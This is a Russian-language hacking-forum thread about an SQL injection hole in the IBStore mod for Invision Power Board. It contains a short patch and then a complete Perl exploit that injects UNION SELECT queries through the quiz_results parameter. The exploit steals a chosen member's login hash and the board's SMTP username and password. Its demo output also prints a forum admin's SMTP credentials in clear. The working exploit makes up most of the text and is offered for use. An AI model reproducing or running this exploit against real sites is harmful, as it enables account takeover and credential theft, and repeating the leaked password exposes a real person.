• XSS.stack #1 – первый литературный журнал от юзеров форума

Видео Уязвимость IBStore

FreeAtNet

HDD-drive
Пользователь
Регистрация
27.03.2005
Сообщения
39
Реакции
0
Видео №x
Тема:Уязвимость SQL-Injection в моде IPB IBStore, как была обнаружена уязвимость
Направление:Web
Уровень:Средний
Интересность: :diablo:

Видео рассказывает об обнаружении мною уязвимости в моде.
:zns5: Скачать
Текст к видео

Патчи:
Код:
$quiz_id = intval($query_id);
$ibforums->input['quiz_id'] = intval($ibforums->input['quiz_id']);
1.Строка 340.
function quiz_check($quiz_id,$let_play) {
global $DB,$ibforums;
Добавить после.
2.Строка 425
function take_quiz() {
global $ibforums, $DB, $std, $print;
Добавить после.
3.Строка 540
function quiz_results() {
global $ibforums,$DB;
Добавить после.

Кто посмотрел, отзовитесь.
 
Ну значит я поглядел. Вывод 1:
ИБСтор - решето. Знал бы - не поставил вообще а терь удалять жалко.

Ну а про то как меня обкакали я вообще молчу...Без обид ;)
 
toha
Да я и не против, размещай. Да и на гадости я не обиделся, да и гадости эти с натяжкой, но как начал смотреть видео - ничо не понял, потому что ржал как меня там обозвали)))
 
FreeAtNet на данный момент не член команды
Это кто сказал? Он НЕ МОДЕР ФОРУМА только и всего. А из членов его никто не исключал и не собирается.

видео снималось не эксклюзивно для дамагелаба
Судя по нашей с ним дискусси, твой факт ошибочен. Просто он продемонстрировал как взломать этот портал, только и всего.

новость писалась исключительно мной
Харашо, тогда удали из новости факты, скопированные отсюда. Пиши типа с 0.


И еще вопрос личного характера: Нафига залил видео на рапидшару? Тебе не кажется что у нас надежнее?
 
Антисекурити тим изготовили сплойт для баги:
Код:
###########################################################################################
#                                                                                         #
#             .] IBStore <= 3.0.2 SQL-injection Exploit (only for IPB 2.x) [.             #
#                                                                                         #
#             ____               _                              _                         #
#            / __ \  /|__ __/|__< >  ___     _____ __    _ ___ < >__/|__                  #
#           | /  \ ||    \\_   //^\ / _ \ /| \    \\ \  /// _ \/^\\_   //| |\             #
#           ||    ||| /^\ | | | | | \ \\///   | /\/ || ||| | \/| |  | || |_| |            #
#           | \___||| | | | | | | |  `\\ \\/ _||    || ||| |   | |  | | \__  |            #
#            \____ || | | | | | | | /\_\\ \\//| \/\ ||_||| |   | |  | |  __| |            #
#                 \||/   \|  \| \_/ \___/  \/ \___/ \___/|_|   \_/   \|  \__/             #
#                                     ___ _  _                                            #
#                                      | |  | ||\/|                                       #
#                                      | |_ |_||  |                                       #
#                                      | |  | ||  |                                       #
#                                      | |_ | ||  |                                       #
#                                                                                         #
#                                   coded  by dukenn                                      #
#                                   greetz to Nitrex                                      #
#                                                                                         #
#------+----------------------------------------------------------------------------------#
# demo |                                                                                  #
#------+                                                                                  #
#                                                                                         #
# sh-2.05b$ perl ibstore.pl www.xss.pro/ / 1 a689a4b549a0a41abb81cfcc937b1052 ibf_ 1 #
#                                                                                         #
# IBStore <= 3.0.2 SQL-injection Exploit by dukenn (AntiSecurity Team)                    #
# [+] pass_hash=a689a4b549a0a41abb81cfcc937b1052                                          #
# [+] smtp_user=admin@xss.pro/                                                       #
# [+] smtp_pass=oil1024                                                                   #
#                                                                                         #
###########################################################################################



#!/usr/bin/perl

use IO::Socket;

print "IBStore <= 3.0.2 SQL-injection Exploit by dukenn (AntiSecurity Team)\n";

if (@ARGV<6)
{
 print "Usage: perl ibstore.pl <host> <path> <id> <pass_hash> <db_prefix> <victim_id>\n";
}
else {
 $host = $ARGV[0];
 $path = $ARGV[1];
 $uid  = $ARGV[2];
 $pwd  = $ARGV[3];
 $pref = $ARGV[4];
 $mid  = $ARGV[5];

 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] ConnectError!\n";
 print $sock "GET ".$path."index.php?act=store&CODE=quiz_results&quiz_id=-999%20UNION%20SELECT%200,0,0,0,member_login_key,0%20FROM%20".$pref."members%20WHERE%20ID=".$mid."/* HTTP/1.0\n";
 print $sock "Host: ".$host."\n";
 print $sock "Cookie: member_id=".$uid."; pass_hash=".$pwd."\n\n";
 while ($ans = <$sock>)
       {
         if ($ans=~ s/showuser=0">(.*?)<\/a>//) {$good=1;$hash=$1;last;}
       }

 if (length($hash)!=0)
  {print "[+] pass_hash=$hash\n";}
   else  {print "[-] pass_hash not found\n";}

 close($sock);
 
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] ConnectError!\n";
 print $sock "GET ".$path."index.php?act=store&CODE=quiz_results&quiz_id=-999%20UNION%20SELECT%200,0,0,0,cs_value,0%20FROM%20".$pref."cache_store%20WHERE%20cs_array=1/* HTTP/1.1\n";
 print $sock "Host: ".$host."\n";
 print $sock "Cookie: member_id=".$uid."; pass_hash=".$pwd."\n\n";
 while ($ans = <$sock>)
       {
           if ($ans=~ s/smtp_user";s:(\d{1,3}):"(.*?)";//) {$smtp_user=$2;}
           if ($ans=~ s/smtp_pass";s:(\d{1,3}):"(.*?)";//) {$smtp_pass=$2;last;}
       }

   if (length($smtp_pass)!=0)
    {
     print "[+] smtp_user=$smtp_user\n";
     print "[+] smtp_pass=$smtp_pass\n";
    }

 close($sock);
}

О нас там ни слова, мы обиделись типа). Есть тока пример взлома меня...Ну хоть на этом пасиба...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх